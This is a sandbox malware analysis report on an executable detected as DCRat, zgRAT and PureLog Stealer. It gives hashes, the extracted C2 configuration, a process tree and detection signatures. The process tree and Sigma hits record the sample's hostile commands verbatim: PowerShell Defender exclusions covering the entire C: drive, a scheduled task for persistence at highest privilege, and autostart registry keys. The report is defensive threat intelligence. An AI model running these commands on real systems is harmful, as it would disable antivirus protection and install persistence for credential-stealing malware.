Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9XHFe6y4Dj.exe

Overview

General Information

Sample name:9XHFe6y4Dj.exe
renamed because original name is a hash value
Original sample name:8213A9C837181823A4D58728637EAEB5.exe
Analysis ID:1538177
MD5:8213a9c837181823a4d58728637eaeb5
SHA1:f574eec251d1695589c1e0e00ae167dfb39216ec
SHA256:68129b517bc27ae2ad742008a7deb67cc9c85209665f73c8fea955c52f1ef33e
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 9XHFe6y4Dj.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
    • csc.exe (PID: 528 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 1564 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7148 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 7136 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4720 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 432 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7324 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7400 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6496 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7472 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7504 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7524 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8808 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 9104 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • 9XHFe6y4Dj.exe (PID: 8812 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 2360 cmdline: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 3480 cmdline: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 8320 cmdline: C:\Users\user\Desktop\9XHFe6y4Dj.exe MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 8628 cmdline: C:\Users\user\Desktop\9XHFe6y4Dj.exe MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 3372 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 7484 cmdline: "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 5160 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 1268 cmdline: "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-dVH10D4cdJAzs948YjfF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
9XHFe6y4Dj.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    9XHFe6y4Dj.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 3 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 9XHFe6y4Dj.exe PID: 6400JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: 9XHFe6y4Dj.exe PID: 8812JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.9XHFe6y4Dj.exe.680000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.9XHFe6y4Dj.exe.680000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1564, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tqeRXJHxPWPPoiNqjJeEYdv
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", ProcessId: 528, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7876, ProcessName: svchost.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", ProcessId: 528, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-20T18:17:54.870250+020020480951A Network Trojan was detected192.168.2.549772188.114.96.380TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 9XHFe6y4Dj.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                            Found malware configuration
                            Source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-dVH10D4cdJAzs948YjfF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeReversingLabs: Detection: 65%
                            Source: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exeReversingLabs: Detection: 65%
                            Source: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\FcMrvptI.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\GzkiCFwe.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\MlnyqaSB.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OoZhLKXw.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\QZUgHzbG.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\RORqBBDl.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\VNlekvqu.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ZInvrbgn.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\aZffRVgZ.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\cmFWEbPY.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\fXkmLoaR.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\koiTwEAQ.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\ohiUtZsx.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\qhLtZjFE.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\wQQSSdrw.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\zKTiJdVm.logReversingLabs: Detection: 29%
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeReversingLabs: Detection: 65%
                            Multi AV Scanner detection for submitted file
                            Source: 9XHFe6y4Dj.exeReversingLabs: Detection: 65%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 9XHFe6y4Dj.exeJoe Sandbox ML: detected
                            Source: 9XHFe6y4Dj.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Windows Defender\Platform\bd46efcfcb9cccJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeDirectory created: C:\Program Files\Uninstall Information\bd46efcfcb9cccJump to behavior
                            Source: 9XHFe6y4Dj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
